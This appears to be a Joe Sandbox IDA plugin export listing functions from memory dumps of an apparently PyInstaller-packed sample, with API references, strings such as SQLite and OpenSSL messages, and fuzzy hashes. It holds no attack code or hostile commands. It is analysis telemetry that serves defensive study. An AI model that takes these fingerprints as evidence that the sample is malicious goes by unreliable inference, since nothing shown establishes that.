Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: e2d0cf860632e4025fa59867ecab262051eec4f2c7b174613d4d04a489a38db7
Instruction ID: ee76ed82c43e56c19b62f7f8ca6a81738a78ba875f312ea27d70703b579cf08b
Opcode Fuzzy Hash: e2d0cf860632e4025fa59867ecab262051eec4f2c7b174613d4d04a489a38db7
Instruction Fuzzy Hash: F78136227086D28AD7689B25D4A0A7E7BA0FB41B84F084172DFAE476D9DF3DF455D300

Function 00007FFDFAF33F30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF3415E

Strings

, xrefs: 00007FFDFAF3400D
CREATE TABLE , xrefs: 00007FFDFAF3404F
, , xrefs: 00007FFDFAF33FEE

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: $, $CREATE TABLE
API String ID: 1405196051-3459038510
Opcode ID: d5681bcdf7bfa2ca83ec83ff2302f8f1caba803ac1806718b92abe7f3bb8db5d
Instruction ID: 22982117e7f26b37b7c2a5564ca6a809eb7b6bd61e9da9d323bac671c501fa38
Opcode Fuzzy Hash: d5681bcdf7bfa2ca83ec83ff2302f8f1caba803ac1806718b92abe7f3bb8db5d
Instruction Fuzzy Hash: E6611762B0868246DB198F28E4506B9B7A2FF41BA5F484375EA6D473E9DF3DD486C300

Function 00007FFDF8551FB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF8551FE8
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF8552006

Strings

HANGUL SYLLABLE , xrefs: 00007FFDF8551FD5
CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDF8551FFC

Memory Dump Source

Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true

Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
Instruction ID: 7a70fafc8467b485fb3828a6d262b08f610a2468142135da882d02ba4a7dd365
Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
Instruction Fuzzy Hash: 75612A72B1824187E7618A15AC20ABA7652FB84BD8F448235EA7D4BBDCDF3CE401D705

Function 00007FF64487D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64487D673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF64487D70A
RtlUnwindEx.KERNEL32 ref: 00007FF64487D764

Strings

csm, xrefs: 00007FF64487D6F1

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: 9ac13814da8063900a28e86598f13c1da37cfc9eee31346957f08f3bb5c07527
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 04518C26B1D6028EDB14BB15E8A5A7873E1EB44B98F148136DE4E8778CEF7CE841C700

Function 00007FFDFAEF8C80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF8D07

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEF8EA1
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEF8E89
database corruption, xrefs: 00007FFDFAEF8E95

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 1405196051-3727861699
Opcode ID: 4e5ba4681e2093be176ca7c8c82f6c6e17af8170c834e63d6ffcf95579cc9b97
Instruction ID: 3fc9e104cfeea0c4d3102fe71d07f578090b92516b748693008ece5383e4ae02
Opcode Fuzzy Hash: 4e5ba4681e2093be176ca7c8c82f6c6e17af8170c834e63d6ffcf95579cc9b97
Instruction Fuzzy Hash: 8E510F72709BC085CB14DB05E4A8AAEBBA4FB59784F55813AEA9E43798DF3DE045C700

Function 00007FFDFAF0C607 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF0C74D
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF0C766

Strings

out of memory, xrefs: 00007FFDFAF12498
string or blob too big, xrefs: 00007FFDFAF12123

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: out of memory$string or blob too big
API String ID: 1405196051-2410398255
Opcode ID: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
Instruction ID: 0c3d622ccd1bb5aae2c24c449aa9f43fb008882fd621850ccfe2c31485c1e23f
Opcode Fuzzy Hash: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
Instruction Fuzzy Hash: A661D362B0866282E7189B26D160A7D6760FF45BE4F188176FE6D4BBDDCF3CE4428710

Function 00007FF64487EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF64487EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF64487EF83

Strings

RCC, xrefs: 00007FF64487EF53
MOC, xrefs: 00007FF64487EF4B

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: bf69efbd19a559e2910b02a1546d6312629e44a9c7fc2dbbe2e400cd7e00b4a3
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 71617532A0CBC589E761BB15E8913A9B7A0FB95794F044225EF9C47B5ADF7CD190CB00

Function 00007FF64487F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64487F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF64487F398

Strings

csm, xrefs: 00007FF64487F3EA
csm, xrefs: 00007FF64487F2D2

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 78056e1bd39a6ad11124c5a0210f35a5339a81971ac2f6d7ea45a5918c4d0b4e
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 51517D32B0C6428EEB64BB2698E626877A4FB55B84F144136DF5D87B9ACF3CE450C701

Function 00007FFDFAED8407 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAED84B8
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAED853E

Strings

(join-%u), xrefs: 00007FFDFAED8549
(subquery-%u), xrefs: 00007FFDFAED8560

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: (join-%u)$(subquery-%u)
API String ID: 1405196051-2916047017
Opcode ID: dd03e86373ea881490972c419df84515b5e456637643e20537e58924f789cd37
Instruction ID: 48326440ffbff9133e0b0dd05fb6fef4919412afa9ccf2f35acc59aa72197a66
Opcode Fuzzy Hash: dd03e86373ea881490972c419df84515b5e456637643e20537e58924f789cd37
Instruction Fuzzy Hash: 2651AE62B1864285EB69AA25D0A4F3D27A1FB14BA4F5546B1C97E473C8DF2EF8418700

Function 00007FFDFAEFFE50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEFFF83

Strings

, xrefs: 00007FFDFAEFFFA2
%!.15g, xrefs: 00007FFDFAEFFFCC
-, xrefs: 00007FFDFAEFFF67

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: $%!.15g$-
API String ID: 1405196051-875264902
Opcode ID: ffdc6392e0312284d0d157c5cf372c93c08476705884f8b4537a0fac0e79bd20
Instruction ID: c47cd27cab8e4de156ca8efcd17df9bcbdaad2620deca80e86c28f94bcf1ad15
Opcode Fuzzy Hash: ffdc6392e0312284d0d157c5cf372c93c08476705884f8b4537a0fac0e79bd20
Instruction Fuzzy Hash: 60414562B1D7C587E714CB2EE060BAA7BA0EB467C0F004175EAAE4779ACB3DD405C710

Function 00007FFDFF1919DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FFDFA9A4D2C.LIBCRYPTO-3 ref: 00007FFDFF1D1D2B
00007FFDFA9A4D2C.LIBCRYPTO-3 ref: 00007FFDFF1D1D6D
00007FFDFA9A4D2C.LIBCRYPTO-3 ref: 00007FFDFF1D1DAF

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FFDFF1D1E1E, 00007FFDFF1D1E30

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c
API String ID: 3568877910-1778748169
Opcode ID: df38dbacce64862afa0680bc413e1b11140b6e2546048526193d0fc8ec849a9d
Instruction ID: 37c193cca530c591b775e7d3c8370499c622f176b953cc9ede325337f184d3bb
Opcode Fuzzy Hash: df38dbacce64862afa0680bc413e1b11140b6e2546048526193d0fc8ec849a9d
Instruction Fuzzy Hash: 4541E567F0AB8380FB55AB2594A4BBD23A4EF40B94F180734DD7D9B6DDDF2CA4419210

Function 00007FF644877E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF64487352C,?,00000000,00007FF644873F1B), ref: 00007FF644877F32

Strings

\, xrefs: 00007FF644877E97
%s%c, xrefs: 00007FF644877EA4
%.*s, xrefs: 00007FF644877EEB

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction ID: 570cc693dccab748ba75edfcd3add18504b94ead668c671b8dee13190dde80b7
Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction Fuzzy Hash: 3C31872171DAC149FA61BB11ECA17AA6294FB84BE4F440231EE6D87BCDDE2CE645C700

Function 00007FF644872810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6448728EA

Strings

ERROR, xrefs: 00007FF64487286F
[PYI-%d:%ls] , xrefs: 00007FF644872868
Error, xrefs: 00007FF6448728DD

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 5ef64e4ba75940d2785d09b4e2bd5248f874b82a868590e140cf925209afb576
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 80217F62B0CB4196E710BB54B8967AA63A4FB88784F404136EE8D97659EF3CD245C740

Function 00007FF64488C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF64488C61F
WriteFile.KERNEL32 ref: 00007FF64488C8E7
WriteFile.KERNEL32 ref: 00007FF64488C92D
GetLastError.KERNEL32 ref: 00007FF64488C9E3

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: eed41a1321574293fa4bb704efeaa59c7f01b00ccf3a77dafb9d5160e58d5464
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 23D1E172B1CA818DE711EF69D4812AC37A1FB65B98B444236DE5ED7B8DDE38D41AC300

Function 00007FFDFAF1DB80 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1DC67
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1DCBB
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1DD17
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1DD97

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID:
API String ID: 1405196051-0
Opcode ID: 0f453df6e1cdd23ca4e5983e4c2c4cfeba04ca82ce74fc5dc41d7678ab95377b
Instruction ID: f2e21e34419b0df6c9ba6425e520dbf2dc24796be64174e5b82b464704bc3ac6
Opcode Fuzzy Hash: 0f453df6e1cdd23ca4e5983e4c2c4cfeba04ca82ce74fc5dc41d7678ab95377b
Instruction Fuzzy Hash: D391AD72B09746A6EB699A129160A2977B0FF45BE0F085774EE7D0B7C9EF3CE4118700

Function 00007FF64488CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D107

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 5c65de6c93bbf58159ffcbd566a08658796fc6587735b1be415a64b3287ab632
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: A9919032E1C6528DF760BF6594C22BD6BE0BB54B88F145139DE0EA6A9DDF38E446C700

Function 00007FF64488F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF64488FA7C
_get_daylight.LIBCMT ref: 00007FF64488FA8D
_get_daylight.LIBCMT ref: 00007FF64488FA9E
_isindst.LIBCMT ref: 00007FF64488FB69

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: c3c9967bac5b45d08fd19d6a38c68faefe2a287d065003f59dee31030e702ab2
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: ED51A672F085118EEB14FF6499E66BC2765AF54369F500235DE1E92AEADF3CE442C600

